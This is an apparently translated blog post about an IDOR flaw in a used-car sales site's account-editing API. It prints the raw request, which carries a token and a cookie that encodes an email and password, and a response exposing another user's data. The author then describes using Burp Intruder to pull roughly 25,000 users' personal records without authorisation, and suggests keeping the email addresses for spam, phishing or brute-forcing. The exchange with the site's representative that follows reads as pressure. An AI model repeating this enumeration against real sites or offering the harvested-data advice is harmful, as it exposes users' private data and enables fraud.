IDOR On site used cars, stealing a database 25,000 users

Saw advertising site that sells used cars, let’s call it the, so as not to spoil the reputation of the resource, I decided  to test it for any vulnerabilities. Discovered a few non-critical and critical one.

It’s iDOR in your account, in the editing of personal data. A gross error, id account is transferred to the post request

POST /api/user/saveUserInfo HTTP/1.1
Host: www.****.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: eyJhbGffOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHBpcmUiOiIyMDE3LTAzLTEyIDE0OjMxOjI1IiwiZW1haWwiOiJxaWVjghpAZ21haWwuY29tIn0.RtQI9h5O16ZS48LuK6rwJXlc1MCNmY8ai5rMywLeEe8
Content-Type: application/json;charset=utf-8
Content-Length: 1590
Cookie: django_language=ru; utm_source=; utm_campaign=red_301; utm_medium=offline; _ga=GA1.2.1196308855.1481541724; _edata=”eyJ1c2VybmFtZSI6InFpZWNlekBnbWFpbC5jb20iLCJwYXNzd29yZCI6InF3ZXJ0eXoxIn0:1cGPlN:i5Sse_VzW0Jtu3tltK3iHCBLYuI”
Connection: close

{“id”:59553,”user”:{“id”:59541,”email”:””,”is_staff”:false,”date_joined”:”2016-12-12T12:20:18.444255Z”},”uuid”:”9b921350-5dce-4796-bdcc-ad11039a18d8″,”email”:””,”state”:{“id”:59553,”state_data”:{“state”:”active”,”state_title”:”Активный”,”state_date”:”2016-12-12T12:30:39.513Z”,”state_val”:true,”state_extra”:{}},”created_extra”:{},”confirmed_extra”:{},”active_extra”:{},”blocked_extra”:{},”deleted_extra”:{},”last_modified”:”2016-12-12T12:30:39.514128Z”,”extra”:”{}”,”created”:true,”created_date”:”2016-12-12T12:20:18.474992Z”,”confirmed”:true,”confirmed_date”:”2016-12-12T12:30:39.480891Z”,”active”:true,”active_date”:”2016-12-12T12:30:39.513982Z”,”blocked”:false,”blocked_date”:null,”deleted”:false,”deleted_date”:null},”allowed_regions”:[],”info”:{“request_source_region”:null,”request_type”:1,”confirmation_code_mail”:null,”confirmation_code_sms”:null,”request_allowed_regions”:null},”images”:{},”is_analyst”:false,”is_mp_moderator”:false,”is_mp_manager”:false,”is_mp_dealer_manager”:false,”is_mp_supervisor”:false,”source_region”:8,”source_region_info”:{“id”:8,”administrative_area”:”Khmel’nyts’ka oblast”,”administrative_area_auto_ria”:”Хмельницк”,”ru_name”:”Хмельницкая область”,”uk_name”:”Хмельницька область”,”slug”:””,”region”:15},”phone”:”111″,”first_name”:”ww”,”last_name”:”ww”,”buyer_type”:1,”rating”:3,”additional_info”:null,”authorized”:false,”email_notification”:true,”sms_notification”:true,”inspect_regions”:[],”inspect_code”:null,”amount”:0,”personal_manager”:223,”supervisor”:51}

Change the “id”: 59541, protection trips, 403. Substitute id “: 59553, gives us your email address, location and name of the user id which is less than me, but do not change the user data, and issued me If changed – it would be.. more critical, we would change the email address on all accounts, and broke them.

There are various workarounds iDOR, the main – is:

HTTP Parameter Pollution – a new kind of attacks on web applications, the main advantage is the ability to bypass WAF (Web Application Firewall). Concept HPP was developed by Italian researchers Luca Carettoni and Stefano di Paola and presented at a recent conference OWASP AppSec EU09 Poland. – (russian website).

When, for example, get or post request has similar variables We can apply Http Parameter Pollution, to bypass the protection idor Attention! During testing, you can often see a 403 error to think that, for example, the article is not edited using iDOR, but when we go into this article, we will see that it has changed. It does not have to be the answer 200. It is important to understand that if you are going as a, hpp then we can not apply.


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Dec 2016 11:44:34 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding
Content-Language: ru
Vary: Accept, Cookie, Accept-Language
Content-Length: 1568

{“id”:59542,”user”:{“id”:59530,”email”:”dimat_**”,”is_staff”:false,”date_joined”:”2016-12-12T11:32:25.950746Z”},”uuid”:”8e8a0ae6-c587-4f44-8e74-e7583f4cdd2e”,”email”:”dimat_**”,”state”:{“id”:59542,”state_data”:{“state”:”active”,”state_title”:”Активный”,”state_date”:”2016-12-12T11:34:51.070Z”,”state_val”:true,”state_extra”:{}},”created_extra”:{},”confirmed_extra”:{},”active_extra”:{},”blocked_extra”:{},”deleted_extra”:{},”last_modified”:”2016-12-12T11:34:51.070647Z”,”extra”:”{}”,”created”:true,”created_date”:”2016-12-12T11:32:25.978469Z”,”confirmed”:true,”confirmed_date”:”2016-12-12T11:34:51.024676Z”,”active”:true,”active_date”:”2016-12-12T11:34:51.070421Z”,”blocked”:false,”blocked_date”:null,”deleted”:false,”deleted_date”:null},”allowed_regions”:[],”info”:{“request_source_region”:null,”confirmation_code_sms”:null,”request_allowed_regions”:null,”confirmation_code_mail”:null,”request_type”:1},”images”:{},”is_analyst”:false,”is_mp_moderator”:false,”is_mp_manager”:false,”is_mp_dealer_manager”:false,”is_mp_supervisor”:false,”source_region”:26,”source_region_info”:{“id”:26,”administrative_area”:”Kyivs’ka oblast”,”administrative_area_auto_ria”:”Киев”,”ru_name”:”Киевская область”,”uk_name”:”Київська область”,”slug”:””,”region”:1},”phone”:”**”,”first_name”:”**”,”last_name”:”**??,”buyer_type”:1,”rating”:3,”additional_info”:null,”authorized”:false,”email_notification”:true,”sms_notification”:true,”inspect_regions”:[],”inspect_code”:null,”amount”:0,”personal_manager”:223,”supervisor”:51}

Well, we found iDOR, and can go to report vulnerabilities.

But many companies do not realize the danger, immediately fix the vulnerability, and prove that it was not dangerous.

Therefore, we are exploiting this iDOR.

Usually after finding iDOR, pick up a few hand-identifier values, then the vulnerability report.

But it is not trying to “spin” more.

In this article I want to tell you about how using iDOR in your account, you can get the personal information of all website users, including administrators (never noticed that wrote about it).

Our id 59553, rounded, we learn that the resource has 60 thousand users.

Now you need use program, that mass goes through requests and gives the answer – Burp licensed to Lary_Lau Intruder. We throw an request to intruder (ctrl + I), select the numbers in the Positions tab, and  in the Payloads tab select numbers from 1 to 59,552. Starting the attack.

Unfortunately, I went through id’s only up to 25 thousand, and the rest could not, administrators delete my account, blocked ip address, and closed the request edit personal information (this is really fun :))


Press button save server responses



get a file from the 50 MB of data.

If you want to – sort the data (only keep email addresses for spam / phishing mailings / bruteforce accounts) in excel or a text editor.

But in order to prove the danger of the administration, 50 MB should be enough answers. Writing an IT company that caters to

qiece: December 13, 2016, 16:24. Hi, Sergey. Yesterday discovered vulnerability at insecure dor editing data in the personal account of the user …

qiece: December 13, 2016, 16:46. I can send you the database to confirm? When i get response?
Representative December 13, 2016, 16:48 No, do not send base.
The representative of the December 13, 2016, 17:35 Max, two points:

1) I need to talk over the matter with the owner of the resource, which periodicity

2) “test” you see – occasionally or on a regular basis? December 13, 2016, qiece: December 13, 2016, 18:44 on a regular basis

qiece: December 14 Good evening, Sergei. Are you discuss cooperation with the owner of a site ???

qiece: December 15th ???
qiece: December 16, 2016, 12:10 Tell me at least, what kind of response the owner. He that is still on his website?
Representative December 16, 2016, 12:37 Maxim, good afternoon. The site owner is very interested in safe work of the site. Shortly, he will make a decision and I’ll know it.

qiece: December 20, 2016, 17:51 Good evening. When you answer? Ignoring – is not the solution to the holes in the security of the site and the compromised user database.

December 14 vulnerabilities fixed, was removed from the post variable id request and said no thanks. With the database 25,000 users, which has been merged – not to say that I deleted it and did not offer the NDA, the company do not care.
I, of course, after a few days of unsuccessful correspondence with the company, deleted a file with this database, because I do not want any trouble. Some black hat could sell it in the darknet.
In this situation, do not blame the company-developer. Blame the owner, who does not think about the site’s security and saves money on it.I hope that this project will grow and eliminate its security holes.
Good luck in the search for vulnerabilities.
Subscribe to Twitter .